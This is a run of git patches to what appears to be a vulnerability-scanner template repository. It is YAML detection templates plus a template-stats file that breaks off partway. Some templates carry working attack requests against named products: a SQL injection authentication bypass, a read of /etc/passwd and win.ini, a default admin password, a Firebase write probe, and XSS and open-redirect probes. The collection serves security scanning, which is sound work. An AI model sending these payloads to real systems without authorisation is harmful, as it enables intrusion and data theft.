Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 8 May 2022 12:13:38 +0530 Subject: [PATCH 049/115] Strict matchers / f/p fix (#4320) * more strict matcher + matcher fix * misc updates --- cves/2018/CVE-2018-18069.yaml | 12 +++++++++--- cves/2019/CVE-2019-14223.yaml | 12 ++++++++---- cves/2020/CVE-2020-15129.yaml | 6 ++++-- cves/2020/CVE-2020-17506.yaml | 7 +++++-- cves/2020/CVE-2020-24550.yaml | 4 ++-- vulnerabilities/other/aspnuke-openredirect.yaml | 7 ++++--- 6 files changed, 32 insertions(+), 16 deletions(-) diff --git a/cves/2018/CVE-2018-18069.yaml b/cves/2018/CVE-2018-18069.yaml index fa3a667894..1a56c2d92d 100644 --- a/cves/2018/CVE-2018-18069.yaml +++ b/cves/2018/CVE-2018-18069.yaml @@ -20,12 +20,18 @@ requests: - method: POST path: - "{{BaseURL}}/wp-admin/admin.php" - body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN">' - redirects: true + body: | + icl_post_action=save_theme_localization&locale_file_name_en=EN"> + + redirects: true + max-redirects: 2 matchers: - type: dsl dsl: - - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")' + - 'contains(tolower(all_headers), "text/html")' + - 'contains(set_cookie, "_icl_current_admin_language")' + - 'contains(body, "\">")' + condition: and # Enhanced by mp on 2022/04/08 diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml index 2617acac22..b2780cf573 100644 --- a/cves/2019/CVE-2019-14223.yaml +++ b/cves/2019/CVE-2019-14223.yaml @@ -14,17 +14,21 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14223 cwe-id: CWE-601 - tags: cve,cve2019,redirect + tags: cve,cve2019,redirect,alfresco requests: - method: POST path: - '{{BaseURL}}/share/page/dologin' + headers: Content-Type: application/x-www-form-urlencoded - body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass + + body: | + success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass + matchers: - type: regex - part: body + part: header regex: - - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$" \ No newline at end of file + - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$" \ No newline at end of file diff --git a/cves/2020/CVE-2020-15129.yaml b/cves/2020/CVE-2020-15129.yaml index 32dceeb7ce..ba9f538db5 100644 --- a/cves/2020/CVE-2020-15129.yaml +++ b/cves/2020/CVE-2020-15129.yaml @@ -19,15 +19,17 @@ requests: - method: GET path: - "{{BaseURL}}" + headers: X-Forwarded-Prefix: "https://foo.nl" + matchers-condition: and matchers: - type: status status: - 302 + - type: word + part: body words: - "Found" - condition: or - part: body \ No newline at end of file diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml index 02f0f27585..b0d7e9d074 100644 --- a/cves/2020/CVE-2020-17506.yaml +++ b/cves/2020/CVE-2020-17506.yaml @@ -19,6 +19,7 @@ requests: - method: GET path: - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;" + redirects: true max-redirects: 1 matchers-condition: and @@ -26,17 +27,19 @@ requests: - type: word words: - "artica-applianc" + - type: status status: - 200 - 301 - 302 condition: or + - type: word - name: session + part: header words: - "PHPSESSID" - part: header + extractors: - type: kval kval: diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index 0425f411ee..173fe2c0d3 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -16,16 +16,16 @@ info: requests: - method: GET - path: - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com' matchers-condition: and matchers: - type: word + part: header words: - "Location: https://example.com" - part: header + - type: status status: - 301 diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml index ca498927f1..e6ce2c4e2f 100644 --- a/vulnerabilities/other/aspnuke-openredirect.yaml +++ b/vulnerabilities/other/aspnuke-openredirect.yaml @@ -9,9 +9,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569" + - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" + matchers: - type: regex - part: body + part: header regex: - - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$' \ No newline at end of file + - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' \ No newline at end of file From c9983139101eb0113fded58061822bff39cd9634 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 8 May 2022 06:43:58 +0000 Subject: [PATCH 051/115] Auto Generated CVE annotations [Sun May 8 06:43:58 UTC 2022] :robot: --- cves/2018/CVE-2018-11231.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2018/CVE-2018-11231.yaml b/cves/2018/CVE-2018-11231.yaml index 396b7b8a23..b6ea184ff6 100644 --- a/cves/2018/CVE-2018-11231.yaml +++ b/cves/2018/CVE-2018-11231.yaml @@ -8,6 +8,12 @@ info: - http://foreversong.cn/archives/1183 - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 tags: opencart,sqli,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11231 + cwe-id: CWE-89 + description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information." requests: - raw: From 62d04d25efba3634029735c5096b8485439aaa07 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Sun, 8 May 2022 14:50:52 +0800 Subject: [PATCH 052/115] Increase judgment conditions to avoid false positives (#4317) * Increase judgment conditions to avoid false positives * misc format update Co-authored-by: sandeep --- network/clickhouse-unauth.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/clickhouse-unauth.yaml b/network/clickhouse-unauth.yaml index 33665dc9a2..5c036da74f 100644 --- a/network/clickhouse-unauth.yaml +++ b/network/clickhouse-unauth.yaml @@ -18,8 +18,9 @@ network: - "{{Host}}:9000" read-size: 100 - matchers: - type: word words: - "ClickHouse" + - "UTC" + condition: and \ No newline at end of file From 384fd65488d90c4ff293eed67b14254cda80a35a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 May 2022 17:45:11 +0530 Subject: [PATCH 054/115] Create panabit-ixcache-default-login.yaml --- .../others/panabit-ixcache-default-login.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 default-logins/others/panabit-ixcache-default-login.yaml diff --git a/default-logins/others/panabit-ixcache-default-login.yaml b/default-logins/others/panabit-ixcache-default-login.yaml new file mode 100644 index 0000000000..6ca7af1572 --- /dev/null +++ b/default-logins/others/panabit-ixcache-default-login.yaml @@ -0,0 +1,36 @@ +id: panabit-ixcache-default-login + +info: + name: Panabit iXCache Default Login + author: ritikchaddha + severity: high + reference: + - http://forum.panabit.com/thread-10830-1-1.html + tags: ixcache,default-login,panabit + +requests: + - raw: + - | + POST /login/userverify.cgi HTTP/1.1 + Host: {{Hostname}} + + username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - ixcache + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "URL=/cgi-bin/monitor.cgi" + + - type: status + status: + - 200 From bac486a802d7b165d93e6b7c9a33cb5022919c91 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 8 May 2022 17:47:11 +0530 Subject: [PATCH 055/115] Create insecure-firebase-database.yaml --- .../google/insecure-firebase-database.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 misconfiguration/google/insecure-firebase-database.yaml diff --git a/misconfiguration/google/insecure-firebase-database.yaml b/misconfiguration/google/insecure-firebase-database.yaml new file mode 100644 index 0000000000..021b394ef2 --- /dev/null +++ b/misconfiguration/google/insecure-firebase-database.yaml @@ -0,0 +1,35 @@ +id: insecure-firebase-database + +info: + name: Insecure Firebase Database + author: rafaelwdornelas + severity: high + description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database. + reference: + - https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty + tags: firebase,google,misconfig + +requests: + - raw: + - | + PUT /{{randstr}}.json HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"id":"insecure-firebase-database"} + + - | + GET /{{randstr}}.json HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '{"id":"insecure-firebase-database"}' + + - type: status + status: + - 200 From ddb9f0a8dcc7e853ae59b06a0253c46905c3b3ea Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 8 May 2022 17:48:27 +0530 Subject: [PATCH 056/115] Update insecure-firebase-database.yaml --- misconfiguration/google/insecure-firebase-database.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/misconfiguration/google/insecure-firebase-database.yaml b/misconfiguration/google/insecure-firebase-database.yaml index 021b394ef2..04e0f83cee 100644 --- a/misconfiguration/google/insecure-firebase-database.yaml +++ b/misconfiguration/google/insecure-firebase-database.yaml @@ -7,6 +7,8 @@ info: description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database. reference: - https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty + metadata: + verified-by: dhiyaneshdk tags: firebase,google,misconfig requests: From 0a3b8887e6a173a5c8004920f767eeee172ace14 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 8 May 2022 12:38:14 +0000 Subject: [PATCH 057/115] Auto Generated New Template Addition List [Sun May 8 12:38:14 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d505ec3fe5..64d3988430 100644 --- a/.new-additions +++ b/.new-additions @@ -33,6 +33,7 @@ file/audit/fortigate/remote-auth-timeout.yaml file/audit/fortigate/scp-admin.yaml file/audit/fortigate/strong-ciphers.yaml fuzzing/valid-gmail-check.yaml +misconfiguration/google/insecure-firebase-database.yaml misconfiguration/unauthenticated-nginx-dashboard.yaml technologies/sucuri-firewall.yaml vulnerabilities/ruijie/ruijie-password-leak.yaml From 4124cb441ae0f117ebdff0c42f67c529f18fbd23 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 May 2022 18:11:28 +0530 Subject: [PATCH 058/115] Update huijietong-cloud-fileread.yaml --- vulnerabilities/other/huijietong-cloud-fileread.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/huijietong-cloud-fileread.yaml b/vulnerabilities/other/huijietong-cloud-fileread.yaml index e28e455fd6..77eef0b789 100644 --- a/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -2,8 +2,10 @@ id: huijietong-cloud-fileread info: name: Huijietong Cloud File Read - author: princechaddha + author: princechaddha,ritikchaddha severity: high + metadata: + fofa-query: body="/him/api/rest/v1.0/node/role" tags: huijietong,lfi requests: @@ -11,13 +13,21 @@ requests: path: - "{{BaseURL}}/fileDownload?action=downloadBackupFile" body: 'fullPath=/etc/passwd' + + - method: POST + path: + - "{{BaseURL}}/fileDownload?action=downloadBackupFile" + body: 'fullPath=/Windows/win.ini' matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" + - "for 16-bit app support" + condition: or - type: status status: From a9de43f0f7f7aac4a578d40b766ef1a3b2338355 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 May 2022 18:14:47 +0530 Subject: [PATCH 059/115] Update huijietong-cloud-fileread.yaml --- vulnerabilities/other/huijietong-cloud-fileread.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/huijietong-cloud-fileread.yaml b/vulnerabilities/other/huijietong-cloud-fileread.yaml index 77eef0b789..41d5664347 100644 --- a/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -13,7 +13,7 @@ requests: path: - "{{BaseURL}}/fileDownload?action=downloadBackupFile" body: 'fullPath=/etc/passwd' - + - method: POST path: - "{{BaseURL}}/fileDownload?action=downloadBackupFile" From 895425425984669d690a9387f888975dcbfc752c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 8 May 2022 12:58:55 +0000 Subject: [PATCH 060/115] Auto Generated Templates Stats [Sun May 8 12:58:55 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 3011 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 1524 insertions(+), 1509 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 2818022736..86583adabe 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1131},{"name":"panel","count":505},{"name":"lfi","count":457},{"name":"xss","count":356},{"name":"wordpress","count":349},{"name":"exposure","count":289},{"name":"rce","count":285},{"name":"cve2021","count":278},{"name":"tech","count":264},{"name":"wp-plugin","count":251},{"name":"cve2020","count":196},{"name":"","count":187},{"name":"token-spray","count":153},{"name":"joomla","count":131},{"name":"apache","count":120},{"name":"cve2018","count":119},{"name":"cve2019","count":118},{"name":"config","count":117},{"name":"cve2010","count":111},{"name":"default-login","count":107},{"name":"iot","count":102},{"name":"unauth","count":98},{"name":"oast","count":96},{"name":"login","count":84},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":66},{"name":"misconfig","count":63},{"name":"cve2017","count":63},{"name":"sqli","count":61},{"name":"file","count":60},{"name":"ssrf","count":59},{"name":"network","count":52},{"name":"oracle","count":48},{"name":"cve2022","count":47},{"name":"router","count":47},{"name":"disclosure","count":45},{"name":"cve2016","count":45},{"name":"wp","count":44},{"name":"plugin","count":40},{"name":"cve2014","count":37},{"name":"auth-bypass","count":36},{"name":"cve2015","count":36},{"name":"google","count":35},{"name":"cisco","count":35},{"name":"authenticated","count":34},{"name":"logs","count":33},{"name":"atlassian","count":31},{"name":"injection","count":30},{"name":"listing","count":30},{"name":"traversal","count":29},{"name":"jira","count":29},{"name":"devops","count":28},{"name":"kubernetes","count":25},{"name":"generic","count":25},{"name":"oss","count":24},{"name":"springboot","count":24},{"name":"adobe","count":24},{"name":"cms","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"vmware","count":21},{"name":"misc","count":21},{"name":"microsoft","count":21},{"name":"debug","count":21},{"name":"intrusive","count":21},{"name":"aem","count":21},{"name":"fuzz","count":20},{"name":"service","count":20},{"name":"wp-theme","count":19},{"name":"cve2012","count":19},{"name":"manageengine","count":18},{"name":"php","count":18},{"name":"dns","count":18},{"name":"zoho","count":17},{"name":"deserialization","count":17},{"name":"tomcat","count":17},{"name":"aws","count":17},{"name":"weblogic","count":17},{"name":"k8s","count":16},{"name":"ibm","count":16},{"name":"jenkins","count":15},{"name":"struts","count":15},{"name":"gitlab","count":15},{"name":"cve2011","count":15},{"name":"dlink","count":15},{"name":"hp","count":14},{"name":"java","count":14},{"name":"xxe","count":14},{"name":"api","count":14},{"name":"fileupload","count":14},{"name":"android","count":14},{"name":"cve2009","count":14},{"name":"camera","count":13},{"name":"log4j","count":12},{"name":"netsweeper","count":12},{"name":"status","count":12},{"name":"printer","count":12},{"name":"rails","count":12},{"name":"cve2013","count":12},{"name":"netgear","count":11},{"name":"graphql","count":11},{"name":"magento","count":11},{"name":"upload","count":11},{"name":"cnvd2021","count":11},{"name":"grafana","count":11},{"name":"ruijie","count":11},{"name":"auth","count":10},{"name":"backup","count":10},{"name":"airflow","count":10},{"name":"nginx","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"coldfusion","count":10},{"name":"glpi","count":10},{"name":"dell","count":10},{"name":"woocommerce","count":9},{"name":"ftp","count":9},{"name":"laravel","count":9},{"name":"lfr","count":9},{"name":"fastjson","count":9},{"name":"github","count":9},{"name":"fortinet","count":9},{"name":"windows","count":9},{"name":"webserver","count":9},{"name":"jndi","count":9},{"name":"drupal","count":9},{"name":"zabbix","count":9},{"name":"cve2008","count":9},{"name":"wso2","count":8},{"name":"iis","count":8},{"name":"scada","count":8},{"name":"blind","count":8},{"name":"confluence","count":8},{"name":"citrix","count":8},{"name":"solr","count":8},{"name":"amazon","count":8},{"name":"vcenter","count":8},{"name":"django","count":8},{"name":"metadata","count":8},{"name":"bypass","count":8},{"name":"mirai","count":8},{"name":"azure","count":8},{"name":"phpmyadmin","count":8},{"name":"prometheus","count":8},{"name":"sonicwall","count":7},{"name":"maps","count":7},{"name":"ssti","count":7},{"name":"kafka","count":7},{"name":"exchange","count":7},{"name":"files","count":7},{"name":"squirrelmail","count":7},{"name":"bucket","count":7},{"name":"rconfig","count":7},{"name":"python","count":7},{"name":"elasticsearch","count":7},{"name":"mail","count":7},{"name":"kube","count":7},{"name":"enum","count":6},{"name":"firebase","count":6},{"name":"druid","count":6},{"name":"docker","count":6},{"name":"slack","count":6},{"name":"jetty","count":6},{"name":"ofbiz","count":6},{"name":"crlf","count":6},{"name":"lucee","count":6},{"name":"sitecore","count":6},{"name":"nodejs","count":6},{"name":"cicd","count":6},{"name":"vpn","count":6},{"name":"headless","count":6},{"name":"backdoor","count":6},{"name":"cobbler","count":6},{"name":"magmi","count":6},{"name":"huawei","count":6},{"name":"zimbra","count":6},{"name":"jboss","count":6},{"name":"go","count":6},{"name":"firmware","count":6},{"name":"cnvd2020","count":6},{"name":"ssl","count":5},{"name":"git","count":5},{"name":"solarwinds","count":5},{"name":"ecology","count":5},{"name":"apisix","count":5},{"name":"alibaba","count":5},{"name":"fatpipe","count":5},{"name":"icewarp","count":5},{"name":"symantec","count":5},{"name":"metinfo","count":5},{"name":"zhiyuan","count":5},{"name":"dedecms","count":5},{"name":"cache","count":5},{"name":"ruby","count":5},{"name":"node","count":5},{"name":"error","count":5},{"name":"kubelet","count":5},{"name":"storage","count":5},{"name":"strapi","count":5},{"name":"artica","count":5},{"name":"rseenet","count":5},{"name":"samsung","count":5},{"name":"gocd","count":5},{"name":"minio","count":5},{"name":"thinkphp","count":5},{"name":"setup","count":5},{"name":"symfony","count":5},{"name":"rfi","count":5},{"name":"fpd","count":5},{"name":"moodle","count":5},{"name":"opensis","count":5},{"name":"keycloak","count":5},{"name":"circarlife","count":5},{"name":"elastic","count":4},{"name":"voip","count":4},{"name":"ognl","count":4},{"name":"jetbrains","count":4},{"name":"plesk","count":4},{"name":"oa","count":4},{"name":"microstrategy","count":4},{"name":"jellyfin","count":4},{"name":"buffalo","count":4},{"name":"cloud","count":4},{"name":"nexus","count":4},{"name":"leak","count":4},{"name":"xmlrpc","count":4},{"name":"bigip","count":4},{"name":"ssh","count":4},{"name":"couchdb","count":4},{"name":"zyxel","count":4},{"name":"artifactory","count":4},{"name":"smtp","count":4},{"name":"adminer","count":4},{"name":"resin","count":4},{"name":"cacti","count":4},{"name":"photo","count":4},{"name":"npm","count":4},{"name":"aspose","count":4},{"name":"cve2007","count":4},{"name":"cnvd2019","count":4},{"name":"websphere","count":4},{"name":"stripe","count":4},{"name":"paypal","count":4},{"name":"prestashop","count":4},{"name":"puppet","count":4},{"name":"sonarqube","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"springcloud","count":4},{"name":"terramaster","count":4},{"name":"microweber","count":4},{"name":"tikiwiki","count":4},{"name":"cockpit","count":4},{"name":"panos","count":4},{"name":"flink","count":4},{"name":"kibana","count":4},{"name":"activemq","count":4},{"name":"beyondtrust","count":4},{"name":"kevinlab","count":4},{"name":"wcs","count":4},{"name":"mailchimp","count":4},{"name":"awstats","count":4},{"name":"search","count":4},{"name":"gogs","count":4},{"name":"caucho","count":4},{"name":"dos","count":4},{"name":"hpe","count":4},{"name":"mongodb","count":4},{"name":"asp","count":4},{"name":"db","count":4},{"name":"hikvision","count":4},{"name":"prtg","count":3},{"name":"seagate","count":3},{"name":"dreambox","count":3},{"name":"jeesns","count":3},{"name":"splunk","count":3},{"name":"exposures","count":3},{"name":"netlify","count":3},{"name":"nacos","count":3},{"name":"globalprotect","count":3},{"name":"phppgadmin","count":3},{"name":"ampps","count":3},{"name":"javascript","count":3},{"name":"openemr","count":3},{"name":"oauth","count":3},{"name":"fortios","count":3},{"name":"grav","count":3},{"name":"axis2","count":3},{"name":"phpinfo","count":3},{"name":"seeyon","count":3},{"name":"dolibarr","count":3},{"name":"log","count":3},{"name":"sharepoint","count":3},{"name":"actuator","count":3},{"name":"trendnet","count":3},{"name":"empirecms","count":3},{"name":"lansweeper","count":3},{"name":"linkerd","count":3},{"name":"httpbin","count":3},{"name":"mongo","count":3},{"name":"kingsoft","count":3},{"name":"trixbox","count":3},{"name":"sendgrid","count":3},{"name":"vrealize","count":3},{"name":"nuuo","count":3},{"name":"bitrix","count":3},{"name":"postmessage","count":3},{"name":"facebook","count":3},{"name":"jamf","count":3},{"name":"zeroshell","count":3},{"name":"horizon","count":3},{"name":"ebs","count":3},{"name":"linksys","count":3},{"name":"messaging","count":3},{"name":"kentico","count":3},{"name":"consul","count":3},{"name":"wordfence","count":3},{"name":"openbmcs","count":3},{"name":"cisa","count":3},{"name":"jfrog","count":3},{"name":"rlm","count":3},{"name":"sql","count":3},{"name":"synology","count":3},{"name":"ems","count":3},{"name":"elfinder","count":3},{"name":"voipmonitor","count":3},{"name":"workspaceone","count":3},{"name":"glassfish","count":3},{"name":"hoteldruid","count":3},{"name":"pentaho","count":3},{"name":"circleci","count":3},{"name":"smb","count":3},{"name":"axis","count":3},{"name":"concrete","count":3},{"name":"database","count":3},{"name":"telerik","count":3},{"name":"thinfinity","count":3},{"name":"webadmin","count":3},{"name":"centos","count":3},{"name":"targa","count":3},{"name":"lotus","count":3},{"name":"sugarcrm","count":3},{"name":"graph","count":3},{"name":"sophos","count":3},{"name":"movable","count":3},{"name":"3cx","count":3},{"name":"openssh","count":3},{"name":"axigen","count":3},{"name":"httpd","count":3},{"name":"fanruan","count":3},{"name":"hashicorp","count":3},{"name":"openam","count":3},{"name":"vbulletin","count":3},{"name":"odoo","count":3},{"name":"subrion","count":3},{"name":"heroku","count":3},{"name":"aptus","count":3},{"name":"nosqli","count":3},{"name":"square","count":3},{"name":"linkedin","count":3},{"name":"mcafee","count":3},{"name":"samba","count":3},{"name":"fuelcms","count":3},{"name":"epson","count":3},{"name":"bruteforce","count":3},{"name":"selea","count":3},{"name":"geowebserver","count":3},{"name":"graphite","count":2},{"name":"netis","count":2},{"name":"yii","count":2},{"name":"ericsson","count":2},{"name":"checkpoint","count":2},{"name":"dvwa","count":2},{"name":"ranger","count":2},{"name":"thruk","count":2},{"name":"justwriting","count":2},{"name":"weather","count":2},{"name":"maian","count":2},{"name":"bigbluebutton","count":2},{"name":"rancher","count":2},{"name":"csrf","count":2},{"name":"frontpage","count":2},{"name":"waf","count":2},{"name":"fortiweb","count":2},{"name":"xxljob","count":2},{"name":"getsimple","count":2},{"name":"seowon","count":2},{"name":"zblogphp","count":2},{"name":"servicenow","count":2},{"name":"projectsend","count":2},{"name":"spark","count":2},{"name":"hjtcloud","count":2},{"name":"sqlite","count":2},{"name":"rackn","count":2},{"name":"pfsense","count":2},{"name":"jitsi","count":2},{"name":"redash","count":2},{"name":"gitea","count":2},{"name":"umbraco","count":2},{"name":"filemanager","count":2},{"name":"clusterengine","count":2},{"name":"bitly","count":2},{"name":"proftpd","count":2},{"name":"neos","count":2},{"name":"flir","count":2},{"name":"s3","count":2},{"name":"jeedom","count":2},{"name":"impresscms","count":2},{"name":"plastic","count":2},{"name":"gophish","count":2},{"name":"avantfax","count":2},{"name":"shellshock","count":2},{"name":"rabbitmq","count":2},{"name":"igs","count":2},{"name":"twitter","count":2},{"name":"appcms","count":2},{"name":"nagios","count":2},{"name":"nasos","count":2},{"name":"fortigate","count":2},{"name":"flightpath","count":2},{"name":"openstack","count":2},{"name":"aviatrix","count":2},{"name":"netscaler","count":2},{"name":"nextjs","count":2},{"name":"ebook","count":2},{"name":"webcam","count":2},{"name":"ad","count":2},{"name":"owasp","count":2},{"name":"tileserver","count":2},{"name":"hadoop","count":2},{"name":"sdwan","count":2},{"name":"casdoor","count":2},{"name":"octoprint","count":2},{"name":"tableau","count":2},{"name":"hubspot","count":2},{"name":"sysaid","count":2},{"name":"itop","count":2},{"name":"auerswald","count":2},{"name":"emerge","count":2},{"name":"airtame","count":2},{"name":"terraform","count":2},{"name":"ambari","count":2},{"name":"wooyun","count":2},{"name":"zerof","count":2},{"name":"redis","count":2},{"name":"gitlist","count":2},{"name":"tenda","count":2},{"name":"tapestry","count":2},{"name":"wuzhicms","count":2},{"name":"syslog","count":2},{"name":"panabit","count":2},{"name":"commax","count":2},{"name":"cloudflare","count":2},{"name":"code42","count":2},{"name":"docs","count":2},{"name":"guacamole","count":2},{"name":"apollo","count":2},{"name":"frp","count":2},{"name":"netsus","count":2},{"name":"idrac","count":2},{"name":"emqx","count":2},{"name":"intercom","count":2},{"name":"tongda","count":2},{"name":"metersphere","count":2},{"name":"netflix","count":2},{"name":"phpstorm","count":2},{"name":"idea","count":2},{"name":"chiyu","count":2},{"name":"kiwitcms","count":2},{"name":"kong","count":2},{"name":"cloudinary","count":2},{"name":"places","count":2},{"name":"ec2","count":2},{"name":"key","count":2},{"name":"motorola","count":2},{"name":"openfire","count":2},{"name":"ilo","count":2},{"name":"lantronix","count":2},{"name":"avtech","count":2},{"name":"embed","count":2},{"name":"skycaiji","count":2},{"name":"fortimail","count":2},{"name":"dynamicweb","count":2},{"name":"glances","count":2},{"name":"digitalrebar","count":2},{"name":"bomgar","count":2},{"name":"avaya","count":2},{"name":"virtualui","count":2},{"name":"rstudio","count":2},{"name":"forcepoint","count":2},{"name":"resourcespace","count":2},{"name":"cocoon","count":2},{"name":"sangfor","count":2},{"name":"favicon","count":2},{"name":"akamai","count":2},{"name":"erxes","count":2},{"name":"influxdb","count":2},{"name":"xweb500","count":2},{"name":"versa","count":2},{"name":"horde","count":2},{"name":"harbor","count":2},{"name":"backups","count":2},{"name":"seeddms","count":2},{"name":"hasura","count":2},{"name":"conductor","count":2},{"name":"detect","count":2},{"name":"yapi","count":2},{"name":"jsf","count":2},{"name":"apereo","count":2},{"name":"alienvault","count":2},{"name":"sidekiq","count":2},{"name":"pulse","count":2},{"name":"swagger","count":2},{"name":"hiveos","count":2},{"name":"qihang","count":2},{"name":"pam","count":2},{"name":"labkey","count":2},{"name":"accela","count":2},{"name":"ecoa","count":2},{"name":"pgadmin","count":2},{"name":"saltstack","count":2},{"name":"zte","count":2},{"name":"payara","count":2},{"name":"text","count":2},{"name":"ametys","count":2},{"name":"xerox","count":2},{"name":"middleware","count":2},{"name":"acrolinx","count":2},{"name":"circontrol","count":2},{"name":"gradle","count":2},{"name":"rosariosis","count":2},{"name":"azkaban","count":2},{"name":"dotnetnuke","count":2},{"name":"cgi","count":2},{"name":"listserv","count":2},{"name":"codeigniter","count":2},{"name":"mailgun","count":2},{"name":"gitbook","count":2},{"name":"aruba","count":2},{"name":"totemomail","count":2},{"name":"natshell","count":2},{"name":"typo3","count":2},{"name":"craftcms","count":2},{"name":"mida","count":2},{"name":"cve2005","count":2},{"name":"lighttpd","count":2},{"name":"zzzcms","count":2},{"name":"akkadian","count":2},{"name":"viewpoint","count":2},{"name":"webmin","count":2},{"name":"jquery","count":2},{"name":"wamp","count":2},{"name":"rocketchat","count":2},{"name":"myfactory","count":2},{"name":"arcgis","count":2},{"name":"homematic","count":2},{"name":"pbootcms","count":2},{"name":"netdata","count":2},{"name":"pcoip","count":2},{"name":"mysql","count":2},{"name":"digitalocean","count":2},{"name":"showdoc","count":2},{"name":"node-red-dashboard","count":2},{"name":"liferay","count":2},{"name":"electron","count":2},{"name":"couchbase","count":2},{"name":"pacsone","count":2},{"name":"javamelody","count":2},{"name":"hostheader-injection","count":2},{"name":"mobileiron","count":2},{"name":"vidyo","count":2},{"name":"phpshowtime","count":2},{"name":"cas","count":2},{"name":"smartstore","count":2},{"name":"ivanti","count":2},{"name":"ruckus","count":2},{"name":"traefik","count":2},{"name":"kafdrop","count":2},{"name":"pega","count":2},{"name":"tidb","count":2},{"name":"domxss","count":2},{"name":"mbean","count":2},{"name":"linux","count":2},{"name":"mantisbt","count":2},{"name":"bigant","count":2},{"name":"pascom","count":2},{"name":"chamilo","count":2},{"name":"intellian","count":2},{"name":"shenyu","count":2},{"name":"globaldomains","count":2},{"name":"openvpn","count":2},{"name":"ovirt","count":2},{"name":"phpcollab","count":2},{"name":"konga","count":2},{"name":"otobo","count":2},{"name":"cve2006","count":2},{"name":"sequoiadb","count":2},{"name":"qcubed","count":2},{"name":"gespage","count":2},{"name":"sentry","count":2},{"name":"rockmongo","count":2},{"name":"openwrt","count":2},{"name":"ansible","count":2},{"name":"chyrp","count":2},{"name":"watchguard","count":2},{"name":"ucmdb",